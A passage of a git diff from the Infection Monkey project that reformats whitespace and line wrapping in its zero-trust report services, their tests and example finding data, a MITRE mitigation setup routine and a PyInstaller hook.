) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status):
worst_status = status
@@ -44,26 +44,27 @@ class PrincipleService:
for test in principle_tests:
test_findings = Finding.objects(test=test)
results.append(
- {
- "test": zero_trust_consts.TESTS_MAP[test][
- zero_trust_consts.TEST_EXPLANATION_KEY
- ],
- "status": PrincipleService.__get_lcd_worst_status_for_test(test_findings),
- }
+ {
+ "test":zero_trust_consts.TESTS_MAP[test][
+ zero_trust_consts.TEST_EXPLANATION_KEY
+ ],
+ "status":PrincipleService.__get_lcd_worst_status_for_test(test_findings),
+ }
)
return results
@staticmethod
def __get_lcd_worst_status_for_test(all_findings_for_test):
"""
- :param all_findings_for_test: All findings of a specific test (get this using Finding.objects(test={A_TEST}))
+ :param all_findings_for_test: All findings of a specific test (get this using
+ Finding.objects(test={A_TEST}))
:return: the "worst" (i.e. most severe) status out of the given findings.
lcd stands for lowest common denominator.
"""
current_worst_status = zero_trust_consts.STATUS_UNEXECUTED
for finding in all_findings_for_test:
if zero_trust_consts.ORDERED_TEST_STATUSES.index(
- finding.status
+ finding.status
) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status):
current_worst_status = finding.status
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py
index 51677efc9..d3bb74e1b 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py
@@ -8,67 +8,69 @@ from monkey_island.cc.services.zero_trust.test_common.finding_data import (
def save_example_findings():
# devices passed = 1
_save_finding_with_status(
- "scoutsuite",
- zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS,
- zero_trust_consts.STATUS_PASSED,
+ "scoutsuite",
+ zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS,
+ zero_trust_consts.STATUS_PASSED,
)
# devices passed = 2
_save_finding_with_status(
- "scoutsuite",
- zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS,
- zero_trust_consts.STATUS_PASSED,
+ "scoutsuite",
+ zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS,
+ zero_trust_consts.STATUS_PASSED,
)
# devices failed = 1
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED
+ "monkey", zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS,
+ zero_trust_consts.STATUS_FAILED
)
# people verify = 1
# networks verify = 1
_save_finding_with_status(
- "scoutsuite", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY
+ "scoutsuite", zero_trust_consts.TEST_SCHEDULED_EXECUTION,
+ zero_trust_consts.STATUS_VERIFY
)
# people verify = 2
# networks verify = 2
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY
+ "monkey", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY
)
# data failed 1
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
+ "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
)
# data failed 2
_save_finding_with_status(
- "scoutsuite",
- zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
- zero_trust_consts.STATUS_FAILED,
+ "scoutsuite",
+ zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
+ zero_trust_consts.STATUS_FAILED,
)
# data failed 3
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
+ "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
)
# data failed 4
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
+ "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED
)
# data failed 5
_save_finding_with_status(
- "scoutsuite",
- zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
- zero_trust_consts.STATUS_FAILED,
+ "scoutsuite",
+ zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
+ zero_trust_consts.STATUS_FAILED,
)
# data verify 1
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY
+ "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY
)
# data verify 2
_save_finding_with_status(
- "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY
+ "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY
)
# data passed 1
_save_finding_with_status(
- "scoutsuite",
- zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
- zero_trust_consts.STATUS_PASSED,
+ "scoutsuite",
+ zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA,
+ zero_trust_consts.STATUS_PASSED,
)
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py
index 37d432bf4..375dbd989 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py
@@ -37,22 +37,22 @@ def test_get_all_findings():
description = TESTS_MAP[TEST_SCOUTSUITE_SERVICE_SECURITY]["finding_explanation"][STATUS_FAILED]
expected_finding0 = EnrichedFinding(
- finding_id=findings[0].finding_id,
- pillars=[DEVICES, NETWORKS],
- status=STATUS_FAILED,
- test=description,
- test_key=TEST_SCOUTSUITE_SERVICE_SECURITY,
- details=None,
+ finding_id=findings[0].finding_id,
+ pillars=[DEVICES, NETWORKS],
+ status=STATUS_FAILED,
+ test=description,
+ test_key=TEST_SCOUTSUITE_SERVICE_SECURITY,
+ details=None,
)
description = TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS]["finding_explanation"][STATUS_PASSED]
expected_finding1 = EnrichedFinding(
- finding_id=findings[1].finding_id,
- pillars=[DEVICES],
- status=STATUS_PASSED,
- test=description,
- test_key=TEST_ENDPOINT_SECURITY_EXISTS,
- details=None,
+ finding_id=findings[1].finding_id,
+ pillars=[DEVICES],
+ status=STATUS_PASSED,
+ test=description,
+ test_key=TEST_ENDPOINT_SECURITY_EXISTS,
+ details=None,
)
# Don't test details
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py
index 36691e00e..f73bd7396 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py
@@ -13,7 +13,8 @@ from common.common_consts.zero_trust_consts import (
WORKLOADS,
)
from monkey_island.cc.services.zero_trust.zero_trust_report.pillar_service import PillarService
-from monkey_island.cc.services.zero_trust.zero_trust_report.test_common.example_finding_data import (
+from monkey_island.cc.services.zero_trust.zero_trust_report.test_common.example_finding_data \
+ import (
save_example_findings,
)
from monkey_island.cc.test_common.fixtures import FixtureEnum
@@ -30,62 +31,62 @@ def test_get_pillars_grades():
def _get_expected_pillar_grades() -> List[dict]:
return [
{
- zero_trust_consts.STATUS_FAILED: 5,
- zero_trust_consts.STATUS_VERIFY: 2,
- zero_trust_consts.STATUS_PASSED: 1,
+ zero_trust_consts.STATUS_FAILED:5,
+ zero_trust_consts.STATUS_VERIFY:2,
+ zero_trust_consts.STATUS_PASSED:1,
# 2 different tests of DATA pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(DATA) - 2,
- "pillar": "Data",
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(DATA) - 2,
+ "pillar":"Data",
},
{
- zero_trust_consts.STATUS_FAILED: 0,
- zero_trust_consts.STATUS_VERIFY: 2,
- zero_trust_consts.STATUS_PASSED: 0,
+ zero_trust_consts.STATUS_FAILED:0,
+ zero_trust_consts.STATUS_VERIFY:2,
+ zero_trust_consts.STATUS_PASSED:0,
# 1 test of PEOPLE pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(PEOPLE) - 1,
- "pillar": "People",
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(PEOPLE) - 1,
+ "pillar":"People",
},
{
- zero_trust_consts.STATUS_FAILED: 0,
- zero_trust_consts.STATUS_VERIFY: 2,
- zero_trust_consts.STATUS_PASSED: 0,
+ zero_trust_consts.STATUS_FAILED:0,
+ zero_trust_consts.STATUS_VERIFY:2,
+ zero_trust_consts.STATUS_PASSED:0,
# 1 different tests of NETWORKS pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(NETWORKS) - 1,
- "pillar": "Networks",
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(NETWORKS) - 1,
+ "pillar":"Networks",
},
{
- zero_trust_consts.STATUS_FAILED: 1,
- zero_trust_consts.STATUS_VERIFY: 0,
- zero_trust_consts.STATUS_PASSED: 2,
+ zero_trust_consts.STATUS_FAILED:1,
+ zero_trust_consts.STATUS_VERIFY:0,
+ zero_trust_consts.STATUS_PASSED:2,
# 1 different tests of DEVICES pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(DEVICES) - 1,
- "pillar": "Devices",
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(DEVICES) - 1,
+ "pillar":"Devices",
},
{
- zero_trust_consts.STATUS_FAILED: 0,
- zero_trust_consts.STATUS_VERIFY: 0,
- zero_trust_consts.STATUS_PASSED: 0,
+ zero_trust_consts.STATUS_FAILED:0,
+ zero_trust_consts.STATUS_VERIFY:0,
+ zero_trust_consts.STATUS_PASSED:0,
# 0 different tests of WORKLOADS pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(WORKLOADS),
- "pillar": "Workloads",
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(WORKLOADS),
+ "pillar":"Workloads",
},
{
- zero_trust_consts.STATUS_FAILED: 0,
- zero_trust_consts.STATUS_VERIFY: 0,
- zero_trust_consts.STATUS_PASSED: 0,
+ zero_trust_consts.STATUS_FAILED:0,
+ zero_trust_consts.STATUS_VERIFY:0,
+ zero_trust_consts.STATUS_PASSED:0,
# 0 different tests of VISIBILITY_ANALYTICS pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(VISIBILITY_ANALYTICS),
- "pillar": "Visibility & Analytics",
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(VISIBILITY_ANALYTICS),
+ "pillar":"Visibility & Analytics",
},
{
- zero_trust_consts.STATUS_FAILED: 0,
- zero_trust_consts.STATUS_VERIFY: 0,
- zero_trust_consts.STATUS_PASSED: 0,
+ zero_trust_consts.STATUS_FAILED:0,
+ zero_trust_consts.STATUS_VERIFY:0,
+ zero_trust_consts.STATUS_PASSED:0,
# 0 different tests of AUTOMATION_ORCHESTRATION pillar were executed in _save_findings()
- zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(
- AUTOMATION_ORCHESTRATION
+ zero_trust_consts.STATUS_UNEXECUTED:_get_cnt_of_tests_in_pillar(
+ AUTOMATION_ORCHESTRATION
),
- "pillar": "Automation & Orchestration",
+ "pillar":"Automation & Orchestration",
},
]
@@ -101,25 +102,25 @@ def _get_cnt_of_tests_in_pillar(pillar: str):
def test_get_pillars_to_statuses():
# Test empty database
expected = {
- zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.DEVICES: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.AUTOMATION_ORCHESTRATION:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.DEVICES:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.NETWORKS:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.PEOPLE:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.VISIBILITY_ANALYTICS:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.WORKLOADS:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.DATA:zero_trust_consts.STATUS_UNEXECUTED,
}
assert PillarService._get_pillars_to_statuses() == expected
# Test with example finding set
save_example_findings()
expected = {
- zero_trust_consts.AUTOMATION_ORCHESTRATION: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.DEVICES: zero_trust_consts.STATUS_FAILED,
- zero_trust_consts.NETWORKS: zero_trust_consts.STATUS_VERIFY,
- zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY,
- zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED,
- zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED,
+ zero_trust_consts.AUTOMATION_ORCHESTRATION:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.DEVICES:zero_trust_consts.STATUS_FAILED,
+ zero_trust_consts.NETWORKS:zero_trust_consts.STATUS_VERIFY,
+ zero_trust_consts.PEOPLE:zero_trust_consts.STATUS_VERIFY,
+ zero_trust_consts.VISIBILITY_ANALYTICS:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.WORKLOADS:zero_trust_consts.STATUS_UNEXECUTED,
+ zero_trust_consts.DATA:zero_trust_consts.STATUS_FAILED,
}
assert PillarService._get_pillars_to_statuses() == expected
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py
index 7eb6b19cd..446cc5b37 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py
@@ -11,28 +11,28 @@ from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service im
from monkey_island.cc.test_common.fixtures import FixtureEnum
EXPECTED_DICT = {
- "test_pillar1": [
+ "test_pillar1":[
{
- "principle": "Test principle description2",
- "status": zero_trust_consts.STATUS_FAILED,
- "tests": [
- {"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test2"},
- {"status": zero_trust_consts.STATUS_FAILED, "test": "You ran a test3"},
+ "principle":"Test principle description2",
+ "status":zero_trust_consts.STATUS_FAILED,
+ "tests":[
+ {"status":zero_trust_consts.STATUS_PASSED, "test":"You ran a test2"},
+ {"status":zero_trust_consts.STATUS_FAILED, "test":"You ran a test3"},
],
}
],
- "test_pillar2": [
+ "test_pillar2":[
{
- "principle": "Test principle description",
- "status": zero_trust_consts.STATUS_PASSED,
- "tests": [{"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test1"}],
+ "principle":"Test principle description",
+ "status":zero_trust_consts.STATUS_PASSED,
+ "tests":[{"status":zero_trust_consts.STATUS_PASSED, "test":"You ran a test1"}],
},
{
- "principle": "Test principle description2",
- "status": zero_trust_consts.STATUS_FAILED,
- "tests": [
- {"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test2"},
- {"status": zero_trust_consts.STATUS_FAILED, "test": "You ran a test3"},
+ "principle":"Test principle description2",
+ "status":zero_trust_consts.STATUS_FAILED,
+ "tests":[
+ {"status":zero_trust_consts.STATUS_PASSED, "test":"You ran a test2"},
+ {"status":zero_trust_consts.STATUS_FAILED, "test":"You ran a test3"},
],
},
],
@@ -46,27 +46,27 @@ def test_get_principles_status():
zero_trust_consts.PILLARS = (TEST_PILLAR1, TEST_PILLAR2)
principles_to_tests = {
- "network_policies": ["segmentation"],
- "endpoint_security": ["tunneling", "scoutsuite_service_security"],
+ "network_policies":["segmentation"],
+ "endpoint_security":["tunneling", "scoutsuite_service_security"],
}
zero_trust_consts.PRINCIPLES_TO_TESTS = principles_to_tests
principles_to_pillars = {
- "network_policies": {"test_pillar2"},
- "endpoint_security": {"test_pillar1", "test_pillar2"},
+ "network_policies":{"test_pillar2"},
+ "endpoint_security":{"test_pillar1", "test_pillar2"},
}
zero_trust_consts.PRINCIPLES_TO_PILLARS = principles_to_pillars
principles = {
- "network_policies": "Test principle description",
- "endpoint_security": "Test principle description2",
+ "network_policies":"Test principle description",
+ "endpoint_security":"Test principle description2",
}
zero_trust_consts.PRINCIPLES = principles
tests_map = {
- "segmentation": {"explanation": "You ran a test1"},
- "tunneling": {"explanation": "You ran a test2"},
- "scoutsuite_service_security": {"explanation": "You ran a test3"},
+ "segmentation":{"explanation":"You ran a test1"},
+ "tunneling":{"explanation":"You ran a test2"},
+ "scoutsuite_service_security":{"explanation":"You ran a test3"},
}
zero_trust_consts.TESTS_MAP = tests_map
diff --git a/monkey/monkey_island/cc/setup.py b/monkey/monkey_island/cc/setup.py
index a03c554be..bf6f627ba 100644
--- a/monkey/monkey_island/cc/setup.py
+++ b/monkey/monkey_island/cc/setup.py
@@ -20,7 +20,7 @@ def try_store_mitigations_on_mongo():
mongo.db.validate_collection(mitigation_collection_name)
if mongo.db.attack_mitigations.count() == 0:
raise errors.OperationFailure(
- "Mitigation collection empty. Try dropping the collection and running again"
+ "Mitigation collection empty. Try dropping the collection and running again"
)
except errors.OperationFailure:
try:
@@ -34,18 +34,18 @@ def try_store_mitigations_on_mongo():
def store_mitigations_on_mongo():
stix2_mitigations = MitreApiInterface.get_all_mitigations()
mongo_mitigations = AttackMitigations.dict_from_stix2_attack_patterns(
- MitreApiInterface.get_all_attack_techniques()
+ MitreApiInterface.get_all_attack_techniques()
)
mitigation_technique_relationships = (
MitreApiInterface.get_technique_and_mitigation_relationships()
)
for relationship in mitigation_technique_relationships:
mongo_mitigations[relationship["target_ref"]].add_mitigation(
- stix2_mitigations[relationship["source_ref"]]
+ stix2_mitigations[relationship["source_ref"]]
)
for relationship in mitigation_technique_relationships:
mongo_mitigations[relationship["target_ref"]].add_no_mitigations_info(
- stix2_mitigations[relationship["source_ref"]]
+ stix2_mitigations[relationship["source_ref"]]
)
for key, mongo_object in mongo_mitigations.items():
mongo_object.save()
diff --git a/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py b/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py
index e5e7ecb5a..785d6a36b 100644
--- a/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py
+++ b/monkey/monkey_island/pyinstaller_hooks/hook-stix2.py
@@ -1,4 +1,5 @@
-# Workaround for packaging Monkey Island using PyInstaller. See https://github.com/oasis-open/cti-python-stix2/issues/218
+# Workaround for packaging Monkey Island using PyInstaller. See
+# https://github.com/oasis-open/cti-python-stix2/issues/218
import os